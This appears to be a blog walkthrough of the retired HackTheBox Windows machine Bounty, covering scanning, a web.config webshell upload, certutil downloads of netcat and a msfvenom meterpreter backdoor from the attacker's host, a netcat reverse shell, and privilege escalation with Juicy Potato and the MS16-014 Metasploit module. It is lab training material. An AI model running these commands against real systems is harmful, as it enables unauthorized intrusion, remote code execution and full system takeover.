Bounty HackTheBox WalkThrough

Bounty HackTheBox Walkthrough

This is Bounty HackTheBox machine walkthrough and is also the 22nd machine of our OSCP like HTB boxes series. In this writeup, I have demonstrated step-by-step how I rooted to Bounty HTB machine. Before starting let us know something about this machine. It is a Windows OS box with IP address 10.10.10.93 and difficulty easy assigned by its maker.

This machine is currently retired so you will require VIP subscription at hackthebox.eu to access this machine. Before starting, connect your PC with HackTheBox VPN so that you can have access to lab machines and make sure your connectivity with Bounty machine by pinging the IP 10.10.10.93. If all goes correct then start hacking. As usual, I started by scanning the machine. Port scanning gives us information about open ports and various services running over them (banner grabbing). I have used Nmap [a port scanner] for this task and the result is below-

Scanning

$ sudo nmap -sC -p- -sV -T3 -oA nmap/full_port 10.10.10.93

Performing nmap scan during Bounty HackTheBox Walkthrough

Nmap found only port 80 as open. Microsoft IIS 7.5 web server is running on it. On accessing the webserver at http://10.10.10.93 found an image of a magician and nothing else. Then tried to check the page source of this page by pressing CTRL+U for some type of hint in the comment section but got nothing interesting.

Bounty Web page

Performing Directory BruteForcing

Then performed directory bruteforcing using $dirbuster (Directory forcer) and wordlist directory-list-2.3-small.txt with extension aspx and asp. I have used these extensions because Microsoft IIS server generally hosts aspx and asp extensions file. Wordlist directory-list-2.3-small.txt is present in the directory /usr/share/wordlists/dirbuster on Kali and Parrot OS.

Directory Bruteforcing in Bounty Htb machine

Directory Bruteforcing revealed a file transfer.aspx and a folder UploadedFiles. After accessing transfer.aspx at URL http://10.10.10.93/transfer.aspx  found an Upload button. Then I tried to upload an image file with jpeg extension and the image file is uploaded to UploadedFiles folder which can be accessed at URL http://10.10.10.93/UploadedFiles/uploaded_image_name.jpeg.

Transfer.aspx page to upload file

Now we have got a means by which we can upload our webshell and access it at URL http://10.10.10.93/UploadedFiles/. Since IIS web server mostly supports aspx & asp file. So I tried to upload aspx webshell but aspx and asp extensions are not allowed. I even tried to bypass this restriction but could not succeed. The reason behind this was extension whitelisting i.e., files with only certain extensions are allowed.

Performing Extension BruteForcing

Then I sent upload request to burp intruder and brute forced with many known extensions which can give us code extension. I have taken this list from this site here.

Extension bruteforcing in Bounty HackTheBox Walkthrough

Extension bruteforcing found only image files and .config extension files are allowed to upload. Now my next step is to find a way by which we can execute OS command using this config extension file. After some googling found an article that explains how we can execute asp code through config file. For complete info check this article. I found a web.config webshell from here. Download this web shell and save it in a file web.config. Now upload this file to the server and access it at http://10.10.10.93/UploadedFiles/web.config . It will open a command window. Run $whoami to confirm your identity.

Getting command execution shell

Now we have remote code execution possible using this web.config file. Let us drop our netcat backdoor nc64.exe to bounty machine to get a command shell via terminal. You can download netcat from here. Start python http webserver locally to host nc64.exe and download it to Bounty machine using $certutil cmd command.

$ sudo python3 -m http.server 80

Python3 http server hosting hc64.exe file

$ certutil.exe -urlcache -split -f "http://10.10.14.7/nc64.exe" C:\Windows\System32\spool\drivers\color\nc64.exe

Downloading nc64.exe on bounty machine

We have successfully dropped our backdoor into the Bounty machine. Let us get user shell on our terminal so that we can control bounty machine remotely.

Getting User Shell

To Get Reverse Shell start netcat listener on your Kali machine and run the following command.

On Kali Machine

$ nc -nvlp 1234

$ whoami

In Web Browser

$ C:\Windows\System32\spool\drivers\color\nc64.exe -e cmd.exe 10.10.14.7 1234

Getting user shell during Bounty HackTheBox Walkthrough

We got a shell on our terminal. Let us capture user flag.

Capture User Flag

$ type \Users\merlin\Desktop\user.txt

Capturing User flag in bounty htb machine walkthrough

Privilege Escalation ~ Method 1

To escalate privilege to administrator we have to first find a privilege escalation vector using which we can perform privilege escalation.

Finding PrivEsc Vector

$ whoami /priv command found token SeImpersonatePrivilege is enabled. This is actually a vulnerability and can be exploited by Juicy Potato exploit. For more info about this vulnerability check this link and juicy potato link is this. When I exploited this machine using Juicy Potato exploit I could easily got admin shell. So here our potential PrivEsc vector is Privilege Escalation through Access Token Manipulation.

Checking privilege of merlin user

To exploit this vulnerability we will require a program that will be executed when we run juicy potato exploit. For this I have created a backdoor.exe file through $msfvenom that will give us shell on $msfconsole. So create backdoor.exe using $msfvenom and send it to Bounty machine.

On Kali Machine

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=4235 --arch x64 -f exe -o backdoor.exe

$ sudo python3 -m http.server 80

On Bounty Machine

$ cd \Windows\Temp\

$ certutil -urlcache -split -f "http://10.10.14.7/backdoor.exe" "backdoor.exe"

Creating and transferring backdoor to bounty machine during Bounty HackTheBox Walkthrough

We have transferred the backdoor.exe file to Bounty machine. Let us download juicy potato binary from this link and transfer it too to Bounty machine.

$ sudo python3 -m http.server 80

$ certutil -urlCache -split -f "http://10.10.14.7/JuicyPotato.exe" "JuicyPotato.exe"

Transferring JuicyPotato binay to bounty machine

We have successfully transferred both the files backdoor.exe and JuicyPotato.exe to Bounty.

Getting Admin Shell

To get admin shell start listener in msfconsole to accept the request upon execution of the backdoor.

On Kali Machine

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 10.10.14.7

msf6 exploit(multi/handler) > set LPORT 4235

msf6 exploit(multi/handler) > exploit

meterpreter > getuid

On Bounty Machine

$ JuicyPotato.exe -t * -p backdoor.exe -l 8003

Privilege escalation-1 in Bounty hackthebox machine

We have successfully escalated the privilege to admin. This was the first way to exploit this box. Now I am going to show you how to exploit this machine in second way.

Privilege Escalation ~ Method 2

$ systeminfo

Running systeminfo command to check hotfixes of bounty machine

$ Systeminfo command revealed that Bounty machine has no Hotfix (patch) installed. There may be chances of Kernel Vulnerability. To test Kernel vulnerability I have transferred this machine access to metasploit so that we can test kernel exploit. We can also test for kernel vulnerability using watson. Metasploit has many number of prebuilt kernel exploits which can be tested by just running some command that’s why I have transferred it to metasploit. So exit from previous admin meterpreter shell and reconfigure the listener to get normal meterpreter shell from backdoor.exe which we have already downloaded in C:\Windows\Temp directory. To get meterpreter shell do the following.

On Kali Machine

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 10.10.14.7

msf6 exploit(multi/handler) > set LPORT 4235

msf6 exploit(multi/handler) > exploit

meterpreter > sysinfo

On Bounty Machine

$ backdoor.exe

Transferring access to metasploit through backdoor.exe

We have got meterpreter shell with user merlin. Let us escalate the privilege to administrator using Kernel exploit. But before this we have to find which kernel exploit will work because there are a lot to test. For this I ran Metasploit’s Post Exploitation Module local_exploit_suggester on Bounty machine. Local Exploit Suggester finds all those Kernel exploits whose patch is not installed in target (here Bounty) machine.

Finding PrivEsc Vector

meterpreter > run multi/recon/local_exploit_suggester

Local exploit suggester result on Bounty machine

Local Exploit Suggester found many kernel exploits. When I tried each of them one by one only windows/local/ms16_014_wmi_recv_notif module worked. So here our another PrivEsc vector is Privilege Escalation using Kernel Exploit. Let us get admin shell. To get admin shell do the following.

Getting Admin Shell

meterpreter > background

msf6 exploit(multi/handler)> use windows/local/ms16_014_wmi_recv_notif

msf6 exploit(windows/local/ms16_014_wmi_recv_notif)> set LHOST 10.10.14.7

msf6 exploit(windows/local/ms16_014_wmi_recv_notif)> set PAYLOAD windows/x64/meterpreter/reverse_tcp

msf6 exploit(windows/local/ms16_014_wmi_recv_notif)> set SESSION 1

msf6 exploit(windows/local/ms16_014_wmi_recv_notif)> exploit

meterpreter > getuid

Privilege Escalation -2 during Bounty hackthebox walkthrough

We are NT AUTHORITY\SYSTEM now. It has the highest privilege in Windows OS even more than Administrator. Let us capture root.txt flag.

Capture Root Flag

meterpreter > search -f "root.txt" C:\\Users

meterpreter > cat "c:\Users\Administrator\Desktop\root.txt"

Capturing root flag during Bounty htb writeup

This was how I rooted to the Bounty HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. For any suggestion about the writeup feel free to write us at [email protected]. Check out our latest walkthroughs at https://ethicalhacs.com/.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am a Computer Science student. I like to share my knowledge of hacking with others. I used to write walkthrough on different challenges of HackTheBox & DVWA . In part time I do bug bounty hunting and penetration testing on websites.